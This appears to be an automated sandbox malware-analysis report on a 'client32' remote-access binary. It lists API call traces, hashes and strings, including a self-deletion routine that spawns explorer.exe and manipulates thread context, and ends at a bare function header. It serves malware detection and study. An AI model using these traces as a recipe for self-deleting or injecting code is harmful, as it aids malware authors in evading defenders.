                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2531364826.000000006CA81000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2531301355.000000006CA80000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2532853143.000000006CAC0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533142363.000000006CAC9000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACA000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533215163.000000006CACE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2533383758.000000006CAD0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_6ca80000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                    • Opcode ID: 2175fa6a22c984be814c4106b3a5bdf9138bc65f477dc8c5530993c2cea7c540
                                                                                                                                                    • Instruction ID: 5a52a631336030e813da83616b96e7bb8f451ac851986d75b80517d12cc239a8
                                                                                                                                                    • Opcode Fuzzy Hash: 2175fa6a22c984be814c4106b3a5bdf9138bc65f477dc8c5530993c2cea7c540
                                                                                                                                                    • Instruction Fuzzy Hash: 0101B9313453129EEB158EA6CC14B5737E6AB41368F188519D815DB980D7759C82CF40
                                                                                                                                                    Function 11170FC4 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,1103179F,00000000,?,1116AC94,?,1103179F,00000000,00000000,00000000,?,1116C627,00000001,00000214,?,1111023E), ref: 11171007
                                                                                                                                                      • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 328603210-0
                                                                                                                                                    • Opcode ID: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                                                    • Instruction ID: 2763c535338e1a2717ceb9c309c83b7f036f5409daf397f77e32ba57fb3352a5
                                                                                                                                                    • Opcode Fuzzy Hash: 5134503a2c8da02e36f93c83ba404df5dd22f98f66039dab1883123dd78627a5
                                                                                                                                                    • Instruction Fuzzy Hash: B301D4353423A79BFB1A8E35CDA4B5BB79ABF827A4F01462DE815CB280D774D800C780
                                                                                                                                                    Function 111681A3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __waccess_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4272103461-0
                                                                                                                                                    • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                    • Instruction ID: ab19ac5a5597399f8d1ca71f455f516602a279338b20f7293c175e29f7786032
                                                                                                                                                    • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                                                    • Instruction Fuzzy Hash: 00C09BB705410D7F5F155DE5EC00C557F5DD6806747149115FD1C89490DD73E961D540
                                                                                                                                                    Function 11164EAD Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fsopen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3646066109-0
                                                                                                                                                    • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                    • Instruction ID: eecee5f277637f0c818c851ebfea4a610619873cfad902e7c0818376e8e04ccc
                                                                                                                                                    • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                                                                                    • Instruction Fuzzy Hash: 0CC09B7644010C77CF111946DC01E4D7F1E97D0664F444010FB1C19560A573E971D585

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 110077A0 Relevance: 86.3, APIs: 35, Strings: 14, Instructions: 548windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(111314CC), ref: 11088BFC
                                                                                                                                                      • Part of subcall function 11088BE0: IsWindow.USER32(?), ref: 11088C16
                                                                                                                                                    • LoadCursorA.USER32(00000000,00007F02), ref: 110077EA
                                                                                                                                                    • SetCursor.USER32(00000000), ref: 110077F1
                                                                                                                                                    • GetDC.USER32(?), ref: 1100781D
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 1100782A
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007934
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007942
                                                                                                                                                    • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11007956
                                                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 11007963
                                                                                                                                                    • CreateCompatibleBitmap.GDI32(?,?,?), ref: 11007975
                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079A1
                                                                                                                                                      • Part of subcall function 110022D0: DeleteObject.GDI32(?), ref: 110022E1
                                                                                                                                                      • Part of subcall function 110022D0: CreatePen.GDI32(?,?,?), ref: 11002308
                                                                                                                                                      • Part of subcall function 11005B70: CreateSolidBrush.GDI32(?), ref: 11005B97
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110079CB
                                                                                                                                                    • SelectClipRgn.GDI32(?,00000000), ref: 110079E0
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 110079ED
                                                                                                                                                    • DeleteDC.GDI32(?), ref: 110079FA
                                                                                                                                                    • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 11007A17
                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 11007A46
                                                                                                                                                    • CreatePen.GDI32(00000002,00000001,00000000), ref: 11007A51
                                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 11007B42
                                                                                                                                                    • GetSysColor.USER32(00000004), ref: 11007B50
                                                                                                                                                    • LoadBitmapA.USER32(00000000,00002EEF), ref: 11007B67
                                                                                                                                                      • Part of subcall function 11142F40: GetObjectA.GDI32(11003D76,00000018,?), ref: 11142F53
                                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F61
                                                                                                                                                      • Part of subcall function 11142F40: CreateCompatibleDC.GDI32(00000000), ref: 11142F66
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F7E
                                                                                                                                                      • Part of subcall function 11142F40: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 11142F91
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11142F9C
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11142FA6
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 11142FC3
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,00000000), ref: 11142FCC
                                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00FFFFFF), ref: 11142FD8
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,008800C6), ref: 11142FF5
                                                                                                                                                      • Part of subcall function 11142F40: SetBkColor.GDI32(00000000,?), ref: 11143000
                                                                                                                                                      • Part of subcall function 11142F40: SetTextColor.GDI32(00000000,00000000), ref: 11143009
                                                                                                                                                      • Part of subcall function 11142F40: BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00EE0086), ref: 11143026
                                                                                                                                                      • Part of subcall function 11142F40: SelectObject.GDI32(00000000,00000000), ref: 11143031
                                                                                                                                                      • Part of subcall function 11110230: _malloc.LIBCMT ref: 11110239
                                                                                                                                                      • Part of subcall function 11110230: _memset.LIBCMT ref: 11110262
                                                                                                                                                    • _memset.LIBCMT ref: 11007BC7
                                                                                                                                                    • _swscanf.LIBCMT ref: 11007C34
                                                                                                                                                      • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007C65
                                                                                                                                                    • _memset.LIBCMT ref: 11007C8C
                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 11007C9F
                                                                                                                                                    • GetObjectA.GDI32(00000000), ref: 11007CA6
                                                                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 11007CB3
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 11007DF6
                                                                                                                                                    • SetWindowTextA.USER32(?,00000000), ref: 11007E33
                                                                                                                                                    • GetSystemMetrics.USER32(00000001), ref: 11007E53
                                                                                                                                                    • GetSystemMetrics.USER32(00000000), ref: 11007E70
                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 11007EC0
                                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 11007986
                                                                                                                                                      • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                                                                      • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                      • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                      • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004C), ref: 1109599E
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004D), ref: 110959A7
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004E), ref: 110959AE
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(00000000), ref: 110959B7
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(0000004F), ref: 110959BD
                                                                                                                                                      • Part of subcall function 11095990: GetSystemMetrics.USER32(00000001), ref: 110959C5
                                                                                                                                                    • UpdateWindow.USER32(?), ref: 11007EF2
                                                                                                                                                    • SetCursor.USER32(?), ref: 11007EFF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create$Object$MetricsSystem$Select$ColorCompatibleWindow$Bitmap$CursorDeleteText_memset$BrushClipFontIndirectLoadSolid$ErrorExitLastMessageProcessRectReleaseStockUpdate_malloc_strrchr_swscanfwsprintf
                                                                                                                                                    • String ID: %d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%d,%s$Annotate$DISPLAY$FillColour$FillStyle$Font$Monitor$PenColour$PenWidth$Show$ShowAppIds$Tool$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                                                                                    • API String ID: 2635354838-2303488826
                                                                                                                                                    • Opcode ID: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                                                                                    • Instruction ID: 6182bcd3debcd054039c16ce38c58758ae1f5640e4e16b95df98d0b4ae7a1d43
                                                                                                                                                    • Opcode Fuzzy Hash: ce91e015fccf874ab5364d5912c202136b1815022c7b0a0c5b798458fb00d7af
                                                                                                                                                    • Instruction Fuzzy Hash: 5422C7B5A00719AFE714CFA4CC85FEAF7B8FB48708F0045A9E26A97684D774A940CF50
                                                                                                                                                    Function 111273E0 Relevance: 68.5, APIs: 31, Strings: 8, Instructions: 289fileprocessthreadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • _memset.LIBCMT ref: 11127400
                                                                                                                                                    • _memset.LIBCMT ref: 1112741D
                                                                                                                                                    • GetVersionExA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 11127436
                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,?,?,?,?,?,00000000,00000000), ref: 11127455
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112749B
                                                                                                                                                    • _strrchr.LIBCMT ref: 111274AA
                                                                                                                                                    • CreateFileA.KERNEL32(?,C0000000,00000005,00000000,00000002,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 111274E3
                                                                                                                                                    • WriteFile.KERNEL32(00000000,111B8C68,000004D0,?,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112750F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000), ref: 1112751C
                                                                                                                                                    • CreateFileA.KERNEL32(?,80000000,00000005,00000000,00000003,04000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 11127537
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,00000000,00000000), ref: 11127547
                                                                                                                                                    • wsprintfA.USER32 ref: 11127561
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                                                                                    • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                                                                                    • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                                                                                    • _strrchr.LIBCMT ref: 111276AB
                                                                                                                                                    • _memmove.LIBCMT ref: 11127724
                                                                                                                                                    • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_memset_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                                                                    • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                                                                    • API String ID: 2219718054-800295887
                                                                                                                                                    • Opcode ID: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                                                                    • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                                                                                    • Opcode Fuzzy Hash: 358ec25b12d5316939eb5b1f22c615080bb201b40904b81bfc467a07c38be4f0
                                                                                                                                                    • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                                                                                    Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111472A0
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 111472C3
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000A.00000002.2510623884.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                    • Associated: 0000000A.00000002.2510574022.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2519676466.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2521599534.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522008878.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001120B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    • Associated: 0000000A.00000002.2522116044.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_10_2_11000000_client32.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                                                    • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                                                    • API String ID: 132346978-2450594007
                                                                                                                                                    • Opcode ID: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                                                    • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                                                                                    • Opcode Fuzzy Hash: d766d68a65dbef05b4443dd6d9e807eb58abfdc436fa79d712fe2cbede22872e
                                                                                                                                                    • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                                                                                    Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON
